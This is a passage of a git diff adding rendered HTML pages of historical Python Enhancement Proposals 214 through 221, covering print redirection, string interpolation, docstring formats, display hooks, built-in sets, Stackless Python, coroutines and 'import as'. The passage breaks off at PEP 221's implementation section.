Response: First of all, this is lacking a feature of the print +statement: the trailing comma, which suppresses the final +newline. Note that ‘print a,’ still isn’t equivalent to +‘sys.stdout.write(a)’ – print inserts a space between items, and +takes arbitrary objects as arguments; write() doesn’t insert a +space and requires a single string.

    +

    When you are considering an extension for the print statement, +it’s not right to add a function or method that adds a new feature +in one dimension (where the output goes) but takes away in another +dimension (spaces between items, and the choice of trailing +newline or not). We could add a whole slew of methods or +functions to deal with the various cases but that seems to add +more confusion than necessary, and would only make sense if we +were to deprecate the print statement altogether.

    +

    I feel that this debate is really about whether print should have +been a function or method rather than a statement. If you are in +the function camp, of course adding special syntax to the existing +print statement is not something you like. I suspect the +objection to the new syntax comes mostly from people who already +think that the print statement was a bad idea. Am I right?

    +

About 10 years ago I debated with myself whether to make the most +basic form of output a function or a statement; basically I was +trying to decide between “print(item, …)” and “print item, …”. +I chose to make it a statement because printing needs to be taught +very early on, and is very important in the programs that +beginners write. Also, because ABC, which led the way for so +many things, made it a statement. In a move that’s typical for +the interaction between ABC and Python, I changed the name from +WRITE to print, and reversed the convention for adding newlines +from requiring extra syntax to add a newline (ABC used trailing +slashes to indicate newlines) to requiring extra syntax (the +trailing comma) to suppress the newline. I kept the feature that +items are separated by whitespace on output.

    +

    Full example: in ABC,

    +
    WRITE 1
    +WRITE 2/
    +
    +
    +

    has the same effect as:

    +
    print 1,
    +print 2
    +
    +
    +

has in Python, outputting in effect “1 2\n”.

    +

    I’m not 100% sure that the choice for a statement was right (ABC +had the compelling reason that it used statement syntax for +anything with side effects, but Python doesn’t have this +convention), but I’m also not convinced that it’s wrong. I +certainly like the economy of the print statement. (I’m a rabid +Lisp-hater – syntax-wise, not semantics-wise! – and excessive +parentheses in syntax annoy me. Don’t ever write return(i) or +if(x==y): in your Python code! :-)

    +

    Anyway, I’m not ready to deprecate the print statement, and over +the years we’ve had many requests for an option to specify the +file.

    +
  • Challenge: Why not > instead of >>?

    Response: To DOS and Unix users, >> suggests “append”, while > +suggests “overwrite”; the semantics are closest to append. Also, +for C++ programmers, >> and << are I/O operators.

    +
  • Challenge: But in C++, >> is input and << is output!

    Response: doesn’t matter; C++ clearly took it from Unix and +reversed the arrows. The important thing is that for output, the +arrow points to the file.

    +
  • Challenge: Surely you can design a println() function that can do all +that print>>file can do; why isn’t that enough?

    Response: I think of this in terms of a simple programming +exercise. Suppose a beginning programmer is asked to write a +function that prints the tables of multiplication. A reasonable +solution is:

    +
    def tables(n):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print i, 'x', j, '=', i*j
    +        print
    +
    +
    +

    Now suppose the second exercise is to add printing to a different +file. With the new syntax, the programmer only needs to learn one +new thing: print >> file, and the answer can be like this:

    +
    def tables(n, file=sys.stdout):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print >> file, i, 'x', j, '=', i*j
    +        print >> file
    +
    +
    +

    With only a print statement and a println() function, the +programmer first has to learn about println(), transforming the +original program to using println():

    +
    def tables(n):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            println(i, 'x', j, '=', i*j)
    +        println()
    +
    +
    +

    and then about the file keyword argument:

    +
    def tables(n, file=sys.stdout):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
+            println(i, 'x', j, '=', i*j, file=file)
+        println(file=file)
    +
    +
    +

    Thus, the transformation path is longer:

    +
    (1) print
    +(2) print >> file
    +
    +
    +

    vs.

    +
    (1) print
    +(2) println()
    +(3) println(file=...)
    +
    +
    +

    Note: defaulting the file argument to sys.stdout at compile time +is wrong, because it doesn’t work right when the caller assigns to +sys.stdout and then uses tables() without specifying the file. +This is a common problem (and would occur with a println() +function too). The standard solution so far has been:

    +
    def tables(n, file=None):
    +    if file is None:
    +        file = sys.stdout
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print >> file, i, 'x', j, '=', i*j
    +        print >> file
    +
    +
    +

    I’ve added a feature to the implementation (which I would also +recommend to println()) whereby if the file argument is None, +sys.stdout is automatically used. Thus,

    +
print >> None, foo, bar
    +
    +
    +

    (or, of course, print >> x where x is a variable whose value is +None) means the same as

    +
    print foo, bar
    +
    +
    +

    and the tables() function can be written as follows:

    +
    def tables(n, file=None):
    +    for j in range(1, n+1):
    +        for i in range(1, n+1):
    +            print >> file, i, 'x', j, '=', i*j
    +        print >> file
    +
    +
    +
+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0214.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0215/index.html b/pep-0215/index.html
new file mode 100644
index 00000000000..edbf5909989
--- /dev/null
+++ b/pep-0215/index.html
@@ -0,0 +1,268 @@
+PEP 215 – String Interpolation | peps.python.org
+
+

+
+
+

PEP 215 – String Interpolation

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
24-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
Superseded-By:
+
292
+
+
+
+
+
+

Important

+

This PEP has been superseded by PEP 292.

+


+

+
+
+

Abstract

+

This document proposes a string interpolation feature for Python +to allow easier string formatting. The suggested syntax change +is the introduction of a ‘$’ prefix that triggers the special +interpretation of the ‘$’ character within a string, in a manner +reminiscent of the variable interpolation found in Unix shells, +awk, Perl, or Tcl.

+
+ +
+

Specification

+

Strings may be preceded with a ‘$’ prefix that comes before the +leading single or double quotation mark (or triplet) and before +any of the other string prefixes (‘r’ or ‘u’). Such a string is +processed for interpolation after the normal interpretation of +backslash-escapes in its contents. The processing occurs just +before the string is pushed onto the value stack, each time the +string is pushed. In short, Python behaves exactly as if ‘$’ +were a unary operator applied to the string. The operation +performed is as follows:

+

The string is scanned from start to end for the ‘$’ character +(\x24 in 8-bit strings or \u0024 in Unicode strings). If there +are no ‘$’ characters present, the string is returned unchanged.

+

Any ‘$’ found in the string, followed by one of the two kinds of +expressions described below, is replaced with the value of the +expression as evaluated in the current namespaces. The value is +converted with str() if the containing string is an 8-bit string, +or with unicode() if it is a Unicode string.

+
    +
  1. A Python identifier optionally followed by any number of trailers, where a trailer consists of:
     - a dot and an identifier,
     - an expression enclosed in square brackets, or
     - an argument list enclosed in parentheses
     (This is exactly the pattern expressed in the Python grammar by “NAME trailer*”, using the definitions in Grammar/Grammar.)
  2. Any complete Python expression enclosed in curly braces.
+

Two dollar-signs (“$$”) are replaced with a single “$”.

+
+
+

Examples

+

Here is an example of an interactive session exhibiting the +expected behaviour of this feature.

+
>>> a, b = 5, 6
+>>> print $'a = $a, b = $b'
+a = 5, b = 6
+>>> $u'uni${a}ode'
+u'uni5ode'
+>>> print $'\$a'
+5
+>>> print $r'\$a'
+\5
+>>> print $'$$$a.$b'
+$5.6
+>>> print $'a + b = ${a + b}'
+a + b = 11
+>>> import sys
+>>> print $'References to $a: $sys.getrefcount(a)'
+References to 5: 15
+>>> print $"sys = $sys, sys = $sys.modules['sys']"
+sys = <module 'sys' (built-in)>, sys = <module 'sys' (built-in)>
+>>> print $'BDFL = $sys.copyright.split()[4].upper()'
+BDFL = GUIDO
+
+
+
+
+

Discussion

+

‘$’ is chosen as the interpolation character within the +string for the sake of familiarity, since it is already used +for this purpose in many other languages and contexts.

+

It is then natural to choose ‘$’ as a prefix, since it is a +mnemonic for the interpolation character.

+

Trailers are permitted to give this interpolation mechanism +even more power than the interpolation available in most other +languages, while the expression to be interpolated remains +clearly visible and free of curly braces.

+

‘$’ works like an operator and could be implemented as an +operator, but that prevents the compile-time optimization +and presents security issues. So, it is only allowed as a +string prefix.

+
+
+

Security Issues

+

“$” has the power to eval, but only to eval a literal. As +described here (a string prefix rather than an operator), it +introduces no new security issues since the expressions to be +evaluated must be literally present in the code.

+
+
+

Implementation

+

The Itpl module at [1] provides a +prototype of this feature. It uses the tokenize module to find +the end of an expression to be interpolated, then calls eval() +on the expression each time a value is needed. In the prototype, +the expression is parsed and compiled again each time it is +evaluated.

+

As an optimization, interpolated strings could be compiled +directly into the corresponding bytecode; that is,

+
$'a = $a, b = $b'
+
+
+

could be compiled as though it were the expression

+
('a = ' + str(a) + ', b = ' + str(b))
+
+
+

so that it only needs to be compiled once.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0215.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0216/index.html b/pep-0216/index.html
new file mode 100644
index 00000000000..e9bde632e69
--- /dev/null
+++ b/pep-0216/index.html
@@ -0,0 +1,262 @@
+PEP 216 – Docstring Format | peps.python.org
+
+

+
+
+

PEP 216 – Docstring Format

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
31-Jul-2000
+
Post-History:
+

+
Superseded-By:
+
287
+
+
+
+
+
+

Important

+

This PEP has been withdrawn.

+


+

It has been superseded by PEP 287.

+

+
+
+

Abstract

+

Named Python objects, such as modules, classes and functions, have a +string attribute called __doc__. If the first expression inside +the definition is a literal string, that string is assigned +to the __doc__ attribute.

+

The __doc__ attribute is called a documentation string, or docstring. +It is often used to summarize the interface of the module, class or +function. However, since there is no common format for documentation +strings, tools for extracting docstrings and transforming those into +documentation in a standard format (e.g., DocBook) have not sprung +up in abundance, and those that do exist are for the most part +unmaintained and unused.

+
+
+

Perl Documentation

+

In Perl, most modules are documented in a format called POD – Plain +Old Documentation. This is an easy-to-type, very low level format +which integrates well with the Perl parser. Many tools exist to turn +POD documentation into other formats: info, HTML and man pages, among +others. However, in Perl, the information is not available at run-time.

+
+
+

Java Documentation

+

In Java, special comments before classes and functions serve to +document the code. A program to extract these and turn them into +HTML documentation is called javadoc, and is part of the standard +Java distribution. However, the only output format that is supported +is HTML, and JavaDoc has a very intimate relationship with HTML.

+
+
+

Python Docstring Goals

+

Python documentation strings are easy to spot during parsing, and are +also available to the runtime interpreter. This double purpose is +a bit problematic, sometimes: for example, some are reluctant to have +too long docstrings, because they do not want to take much space in +the runtime. In addition, because of the current lack of tools, people +read objects’ docstrings by “print”ing them, so a tendency to make them +brief and free of markup has sprung up. This tendency hinders writing +better documentation-extraction tools, since it causes docstrings to +contain little information, which is hard to parse.

+
+
+

High Level Solutions

+

To counter the objection that the strings take up space in the running +program, it is suggested that documentation extraction tools will +concatenate a maximum prefix of string literals which appear in the +beginning of a definition. The first of these will also be available +in the interactive interpreter, so it should contain a few summary +lines.

+
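For example (an illustration of the rule above, not text from the PEP), a definition could carry a short interactive summary followed by further literals that only the extraction tools would gather:

def fetch(url):
    "Fetch a document; this first literal is the interactive summary."
    """Only the first literal becomes __doc__ at run-time; an
    extraction tool following the rule above would concatenate this
    second literal (and any further leading literals) with the first
    to form the full documentation."""
    pass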
+
+

Docstring Format Goals

+

These are the goals for the docstring format, as discussed ad nauseam +in the doc-sig.

+
    +
  1. It must be easy to type with any standard text editor.
  2. It must be readable to the casual observer.
  3. It must not contain information which can be deduced from parsing the module.
  4. It must contain sufficient information so it can be converted to any reasonable markup format.
  5. It must be possible to write a module’s entire documentation in docstrings, without feeling hampered by the markup language.
+
+
+

Docstring Contents

+

Requirement 5 above makes it necessary to specify what must be in docstrings.

+

At least the following must be available:

+
    +
  1. A tag that means “this is a Python something, guess what”
     Example: In the sentence “The POP3 class”, we need to mark up “POP3” so. The parser will be able to guess it is a class from the contents of the poplib module, but we need to make it guess.
  2. Tags that mean “this is a Python class/module/class var/instance var…”
     Example: The usual Python idiom for singleton class A is to have _A as the class, and A a function which returns _A objects. It’s usual to document the class, nonetheless, as being A. This requires the strength to say “The class A” and have A hyperlinked and marked-up as a class.
  3. An easy way to include Python source code/Python interactive sessions
  4. Emphasis/bold
  5. List/tables
+
+
+

Docstring Basic Structure

+

The documentation strings will be in StructuredTextNG +(http://www.zope.org/Members/jim/StructuredTextWiki/StructuredTextNG). +Since StructuredText is not yet strong enough to handle requirements 1 and 2 +above, we will need to extend it. I suggest using +[<optional description>:python identifier]. +E.g.: [class:POP3], [:POP3.list], etc. If the description is missing, +a guess will be made from the text.

+
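A hypothetical docstring using the suggested notation might read:

def listing(server):
    """Return the message list from a [class:POP3] connection.

    Calls the [:POP3.list] method on the given server object; see
    the [module:poplib] documentation for details.
    """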
+
+

Unresolved Issues

+

Is there a way to escape characters in ST? If so, how? +(example: * at the beginning of a line without being a bullet symbol)

+

Is my suggestion above for Python symbols compatible with ST-NG? +How hard would it be to extend ST-NG to support it?

+

How do we describe input and output types of functions?

+

What additional constraints do we enforce on each kind of docstring +(module/class/function)?

+

What are the guesser rules?

+
+
+

Rejected Suggestions

+

XML – it’s very hard to type, and too cluttered to read comfortably.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0216.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0217/index.html b/pep-0217/index.html
new file mode 100644
index 00000000000..eaa9cc0c8fe
--- /dev/null
+++ b/pep-0217/index.html
@@ -0,0 +1,172 @@
+PEP 217 – Display Hook for Interactive Use | peps.python.org
+
+

+
+
+

PEP 217 – Display Hook for Interactive Use

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
31-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

Python’s interactive mode is one of the implementation’s great +strengths – being able to write expressions on the command line +and get back a meaningful output. However, the output function +cannot be all things to all people, and the current output +function too often falls short of this goal. This PEP describes a +way to provide alternatives to the built-in display function in +Python, so users will have control over the output from the +interactive interpreter.

+
+
+

Interface

+

The current Python solution has worked for many users, and this +should not break it. Therefore, in the default configuration, +nothing will change in the REPL loop. To change the way the +interpreter prints interactively entered expressions, users +will have to rebind sys.displayhook to a callable object. +The result of calling this object with the result of the +interactively entered expression should be print-able, +and this is what will be printed on sys.stdout.

+
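A minimal sketch of such a rebinding, in Python 2 syntax (the output format chosen here is purely illustrative):

import sys

def tagged_displayhook(value):
    # Mimic the default behaviour of ignoring None results.
    if value is None:
        return
    sys.stdout.write('==> %r\n' % (value,))

sys.displayhook = tagged_displayhook

A full replacement would normally also maintain __builtin__._, as the equivalent code in the Solution section below shows.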
+
+

Solution

+

The bytecode PRINT_EXPR will call sys.displayhook(POP()). +A displayhook() will be added to the sys builtin module, which is +equivalent to:

+
import __builtin__
+def displayhook(o):
+    if o is None:
+        return
+    __builtin__._ = None
+    print `o`
+    __builtin__._ = o
+
+
+
+
+

Jython Issues

+

The method Py.printResult will be similarly changed.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0217.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0218/index.html b/pep-0218/index.html
new file mode 100644
index 00000000000..e078f6a6f08
--- /dev/null
+++ b/pep-0218/index.html
@@ -0,0 +1,347 @@
+PEP 218 – Adding a Built-In Set Object Type | peps.python.org
+
+

+
+
+

PEP 218 – Adding a Built-In Set Object Type

+
+
Author:
+
Greg Wilson <gvwilson at ddj.com>, Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
31-Jul-2000
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
+
+

Introduction

+

This PEP proposes adding a Set module to the standard Python +library, and to then make sets a built-in Python type if that +module is widely used. After explaining why sets are desirable, +and why the common idiom of using dictionaries in their place is +inadequate, we describe how we intend built-in sets to work, and +then how the preliminary Set module will behave. The last +section discusses the mutability (or otherwise) of sets and set +elements, and the solution which the Set module will implement.

+
+
+

Rationale

+

Sets are a fundamental mathematical structure, and are very +commonly used in algorithm specifications. They are much less +frequently used in implementations, even when they are the “right” +structure. Programmers frequently use lists instead, even when +the ordering information in lists is irrelevant, and by-value +lookups are frequent. (Most medium-sized C programs contain a +depressing number of start-to-end searches through malloc’d +vectors to determine whether particular items are present or +not…)

+

Programmers are often told that they can implement sets as +dictionaries with “don’t care” values. Items can be added to +these “sets” by assigning the “don’t care” value to them; +membership can be tested using dict.has_key; and items can be +deleted using del. However, the other main operations on sets +(union, intersection, and difference) are not directly supported +by this representation, since their meaning is ambiguous for +dictionaries containing key/value pairs.

+
+
+

Proposal

+

The long-term goal of this PEP is to add a built-in set type to +Python. This type will be an unordered collection of unique +values, just as a dictionary is an unordered collection of +key/value pairs.

+

Iteration and comprehension will be implemented in the obvious +ways, so that:

+
for x in S:
+
+
+

will step through the elements of S in arbitrary order, while:

+
set(x**2 for x in S)
+
+
+

will produce a set containing the squares of all elements in S. +Membership will be tested using in and not in, and basic set +operations will be implemented by a mixture of overloaded +operators:

+ + + + + + + + + + + + + + + + + + + + + +
|             union
&             intersection
^             symmetric difference
-             asymmetric difference
== !=         equality and inequality tests
< <= >= >     subset and superset tests
+

and methods:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
S.add(x)          Add “x” to the set.
S.update(s)       Add all elements of sequence “s” to the set.
S.remove(x)       Remove “x” from the set. If “x” is not present, this method raises a LookupError exception.
S.discard(x)      Remove “x” from the set if it is present, or do nothing if it is not.
S.pop()           Remove and return an arbitrary element, raising a LookupError if the element is not present.
S.clear()         Remove all elements from this set.
S.copy()          Make a new set.
s.issuperset()    Check for a superset relationship.
s.issubset()      Check for a subset relationship.
+

and two new built-in conversion functions:

+ + + + + + + + + +
set(x)          Create a set containing the elements of the collection “x”.
frozenset(x)    Create an immutable set containing the elements of the collection “x”.
+
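For instance (an illustrative session using the eventual built-in names):

>>> S = set([1, 2, 3])
>>> T = set([3, 4])
>>> S | T                    # union
set([1, 2, 3, 4])
>>> S & T                    # intersection
set([3])
>>> S ^ T                    # symmetric difference
set([1, 2, 4])
>>> S - T                    # asymmetric difference
set([1, 2])
>>> set([1, 2]) <= S         # subset test
True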

Notes:

+
    +
  1. We propose using the bitwise operators “|” and “&” for union and intersection. While “+” for union would be intuitive, “*” for intersection is not (very few of the people asked guessed what it did correctly).
  2. We considered using “+” to add elements to a set, rather than “add”. However, Guido van Rossum pointed out that “+” is symmetric for other built-in types (although “*” is not). Use of “add” will also avoid confusion between that operation and set union.
+
+
+

Set Notation

+

The PEP originally proposed {1,2,3} as the set notation and {-} for +the empty set. Experience with Python 2.3’s sets.py showed that +the notation was not necessary. Also, there was some risk of making +dictionaries less instantly recognizable.

+

It was also contemplated that the braced notation would support set +comprehensions; however, Python 2.4 provided generator expressions +which fully met that need and did so in a more general way. +(See PEP 289 for details on generator expressions).

+

So, Guido ruled that there would not be a set syntax; however, the +issue could be revisited for Python 3000 (see PEP 3000).

+
+
+

History

+

To gain experience with sets, a pure python module was introduced +in Python 2.3. Based on that implementation, the set and frozenset +types were introduced in Python 2.4. The improvements are:

+
    +
  • Better hash algorithm for frozensets
  • More compact pickle format (storing only an element list instead of a dictionary of key:value pairs where the value is always True).
  • Use a __reduce__ function so that deep copying is automatic.
  • The BaseSet concept was eliminated.
  • The union_update() method became just update().
  • Auto-conversion between mutable and immutable sets was dropped.
  • The _repr method was dropped (the need is met by the new sorted() built-in function).
+

Tim Peters believes that the class’s constructor should take a +single sequence as an argument, and populate the set with that +sequence’s elements. His argument is that in most cases, +programmers will be creating sets from pre-existing sequences, so +that this case should be the common one. However, this would +require users to remember an extra set of parentheses when +initializing a set with known values:

+
>>> Set((1, 2, 3, 4))       # case 1
+
+
+

On the other hand, feedback from a small number of novice Python +users (all of whom were very experienced with other languages) +indicates that people will find a “parenthesis-free” syntax more +natural:

+
>>> Set(1, 2, 3, 4)         # case 2
+
+
+

Ultimately, we adopted the first strategy in which the initializer +takes a single iterable argument.

+
+
+

Mutability

+

The most difficult question to resolve in this proposal was +whether sets ought to be able to contain mutable elements. A +dictionary’s keys must be immutable in order to support fast, +reliable lookup. While it would be easy to require set elements +to be immutable, this would preclude sets of sets (which are +widely used in graph algorithms and other applications).

+

Earlier drafts of PEP 218 had only a single set type, but the +sets.py implementation in Python 2.3 has two, Set and +ImmutableSet. For Python 2.4, the new built-in types were named +set and frozenset which are slightly less cumbersome.

+

There are two classes implemented in the “sets” module. Instances +of the Set class can be modified by the addition or removal of +elements, and the ImmutableSet class is “frozen”, with an +unchangeable collection of elements. Therefore, an ImmutableSet +may be used as a dictionary key or as a set element, but cannot be +updated. Both types of set require that their elements are +immutable, hashable objects. Parallel comments apply to the “set” +and “frozenset” built-in types.

+
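For example (illustrative, with the 2.4 built-in names):

>>> key = frozenset(['read', 'write'])
>>> permissions = {key: 'rw'}    # a frozenset works as a dictionary key
>>> groups = set([key])          # ...and as a set element
>>> {set(['read']): 'r'}         # a mutable set raises TypeError here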
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0218.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0219/index.html b/pep-0219/index.html
new file mode 100644
index 00000000000..1522e8e7db3
--- /dev/null
+++ b/pep-0219/index.html
@@ -0,0 +1,294 @@
+PEP 219 – Stackless Python | peps.python.org
+
+

+
+
+

PEP 219 – Stackless Python

+
+
Author:
+
Gordon McMillan <gmcm at hypernet.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
14-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Introduction

+

This PEP discusses changes required to core Python in order to +efficiently support generators, microthreads and coroutines. It is +related to PEP 220, which describes how Python should be extended +to support these facilities. The focus of this PEP is strictly on +the changes required to allow these extensions to work.

+

While these PEPs are based on Christian Tismer’s Stackless [1] +implementation, they do not regard Stackless as a reference +implementation. Stackless (with an extension module) implements +continuations, and from continuations one can implement +coroutines, microthreads (as has been done by Will Ware [2]) and +generators. But in more than a year, no one has found any other +productive use of continuations, so there seems to be no demand +for their support.

+

However, Stackless support for continuations is a relatively minor +piece of the implementation, so one might regard it as “a” +reference implementation (rather than “the” reference +implementation).

+
+
+

Background

+

Generators and coroutines have been implemented in a number of +languages in a number of ways. Indeed, Tim Peters has done pure +Python implementations of generators [3] and coroutines [4] using +threads (and a thread-based coroutine implementation exists for +Java). However, the horrendous overhead of a thread-based +implementation severely limits the usefulness of this approach.

+

Microthreads (a.k.a “green” or “user” threads) and coroutines +involve transfers of control that are difficult to accommodate in +a language implementation based on a single stack. (Generators can +be done on a single stack, but they can also be regarded as a very +simple case of coroutines.)

+

Real threads allocate a full-sized stack for each thread of +control, and this is the major source of overhead. However, +coroutines and microthreads can be implemented in Python in a way +that involves almost no overhead. This PEP, therefore, offers a +way for making Python able to realistically manage thousands of +separate “threads” of activity (vs. today’s limit of perhaps dozens +of separate threads of activity).

+

Another justification for this PEP (explored in PEP 220) is that +coroutines and generators often allow a more direct expression of +an algorithm than is possible in today’s Python.

+
+
+

Discussion

+

The first thing to note is that while Python mingles +interpreter data (normal C stack usage) with Python data (the +state of the interpreted program) on the stack, the two are +logically separate. They just happen to use the same stack.

+

A real thread gets something approaching a process-sized stack +because the implementation has no way of knowing how much stack +space the thread will require. The stack space required for an +individual frame is likely to be reasonable, but stack switching +is an arcane and non-portable process, not supported by C.

+

Once Python stops putting Python data on the C stack, however, +stack switching becomes easy.

+

The fundamental approach of the PEP is based on these two +ideas. First, separate C’s stack usage from Python’s stack +usage. Secondly, associate with each frame enough stack space to +handle that frame’s execution.

+

In the normal usage, Stackless Python has a normal stack +structure, except that it is broken into chunks. But in the +presence of a coroutine / microthread extension, this same +mechanism supports a stack with a tree structure. That is, an +extension can support transfers of control between frames outside +the normal “call / return” path.

+
+
+

Problems

+

The major difficulty with this approach is C calling Python. The +problem is that the C stack now holds a nested execution of the +byte-code interpreter. In that situation, a coroutine / +microthread extension cannot be permitted to transfer control to a +frame in a different invocation of the byte-code interpreter. If a +frame were to complete and exit back to C from the wrong +interpreter, the C stack could be trashed.

+

The ideal solution is to create a mechanism where nested +executions of the byte code interpreter are never needed. The easy +solution is for the coroutine / microthread extension(s) to +recognize the situation and refuse to allow transfers outside the +current invocation.

+

We can categorize code that involves C calling Python into two +camps: Python’s implementation, and C extensions. And hopefully we +can offer a compromise: Python’s internal usage (and C extension +writers who want to go to the effort) will no longer use a nested +invocation of the interpreter. Extensions which do not go to the +effort will still be safe, but will not play well with coroutines +/ microthreads.

+

Generally, when a recursive call is transformed into a loop, a bit +of extra bookkeeping is required. The loop will need to keep its +own “stack” of arguments and results since the real stack can now +only hold the most recent. The code will be more verbose, because +it’s not quite as obvious when we’re done. While Stackless is not +implemented this way, it has to deal with the same issues.

+
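The same bookkeeping shows up when an ordinary Python recursion is rewritten as a loop with an explicit stack; this is only an analogy for the transformation, not Stackless code (it assumes nodes with left and right attributes):

def depth(node):                  # recursive: state lives on the call stack
    if node is None:
        return 0
    return 1 + max(depth(node.left), depth(node.right))

def depth_loop(root):             # looped: state lives in explicit lists
    todo, depths = [(root, 1)], [0]
    while todo:
        node, d = todo.pop()
        if node is not None:
            depths.append(d)
            todo.append((node.left, d + 1))
            todo.append((node.right, d + 1))
    return max(depths)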

In normal Python, PyEval_EvalCode is used to build a frame and +execute it. Stackless Python introduces the concept of a +FrameDispatcher. Like PyEval_EvalCode, it executes one frame. But +the interpreter may signal the FrameDispatcher that a new frame +has been swapped in, and the new frame should be executed. When a +frame completes, the FrameDispatcher follows the back pointer to +resume the “calling” frame.

+

So Stackless transforms recursions into a loop, but it is not the +FrameDispatcher that manages the frames. This is done by the +interpreter (or an extension that knows what it’s doing).

+

The general idea is that where C code needs to execute Python +code, it creates a frame for the Python code, setting its back +pointer to the current frame. Then it swaps in the frame, signals +the FrameDispatcher and gets out of the way. The C stack is now +clean - the Python code can transfer control to any other frame +(if an extension gives it the means to do so).

+

In the vanilla case, this magic can be hidden from the programmer +(even, in most cases, from the Python-internals programmer). Many +situations present another level of difficulty, however.

+

The map builtin function involves two obstacles to this +approach. It cannot simply construct a frame and get out of the +way, not just because there’s a loop involved, but each pass +through the loop requires some “post” processing. In order to play +well with others, Stackless constructs a frame object for map +itself.

+

Most recursions of the interpreter are not this complex, but +fairly frequently, some “post” operations are required. Stackless +does not fix these situations because of the amount of code changes +required. Instead, Stackless prohibits transfers out of a nested +interpreter. While not ideal (and sometimes puzzling), this +limitation is hardly crippling.

+
+
+

Advantages

+

For normal Python, the advantage to this approach is that C stack +usage becomes much smaller and more predictable. Unbounded +recursion in Python code becomes a memory error, instead of a +stack error (and thus, in non-Cupertino operating systems, +something that can be recovered from). The price, of course, is +the added complexity that comes from transforming recursions of +the byte-code interpreter loop into a higher order loop (and the +attendant bookkeeping involved).

+

The big advantage comes from realizing that the Python stack is +really a tree, and the frame dispatcher can transfer control +freely between leaf nodes of the tree, thus allowing things like +microthreads and coroutines.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0219.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0220/index.html b/pep-0220/index.html
new file mode 100644
index 00000000000..4368c201687
--- /dev/null
+++ b/pep-0220/index.html
@@ -0,0 +1,139 @@
+PEP 220 – Coroutines, Generators, Continuations | peps.python.org
+
+

+
+
+

PEP 220 – Coroutines, Generators, Continuations

+
+
Author:
+
Gordon McMillan <gmcm at hypernet.com>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
14-Aug-2000
+
Post-History:
+

+
+
+
+
+
+

Warning

+

This PEP has been rejected.

+


+

+
+
+

Abstract

+

Demonstrates why the changes described in the stackless PEP are +desirable. A low-level continuations module exists. With it, +coroutines and generators and “green” threads can be written. A +higher level module that makes coroutines and generators easy to +create is desirable (and being worked on). The focus of this PEP +is on showing how coroutines, generators, and green threads can +simplify common programming problems.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0220.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0221/index.html b/pep-0221/index.html
new file mode 100644
index 00000000000..d34af13223c
--- /dev/null
+++ b/pep-0221/index.html
@@ -0,0 +1,231 @@
+PEP 221 – Import As | peps.python.org
+
+

+
+
+

PEP 221 – Import As

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Aug-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
+
+

Introduction

+

This PEP describes the import as proposal for Python 2.0. This +PEP tracks the status and ownership of this feature. It contains +a description of the feature and outlines changes necessary to +support the feature. The CVS revision history of this file +contains the definitive historical record.

+
+
+

Rationale

+

This PEP proposes an extension of Python syntax regarding the +import and from <module> import statements. These statements +load in a module, and either bind that module to a local name, or +bind objects from that module to a local name. However, it is +sometimes desirable to bind those objects to a different name, for +instance to avoid name clashes. This can currently be achieved +using the following idiom:

+
import os
+real_os = os
+del os
+
+
+

And similarly for the from ... import statement:

+
from os import fdopen, exit, stat
+os_fdopen = fdopen
+os_stat = stat
+del fdopen, stat
+
+
+

The proposed syntax change would add an optional as clause to +both these statements, as follows:

+
import os as real_os
+from os import fdopen as os_fdopen, exit, stat as os_stat
+
+
+

The as name is not intended to be a keyword, and some trickery +has to be used to convince the CPython parser it isn’t one. For +more advanced parsers/tokenizers, however, this should not be a +problem.

+

A slightly special case exists for importing sub-modules. The +statement

+
import os.path
+
+
+

stores the module os locally as os, so that the imported +submodule path is accessible as os.path. As a result,

+
import os.path as p
+
+
+

stores os.path, not os, in p. This makes it effectively the +same as

+
from os import path as p
+
+
+
+
+

Implementation details

+

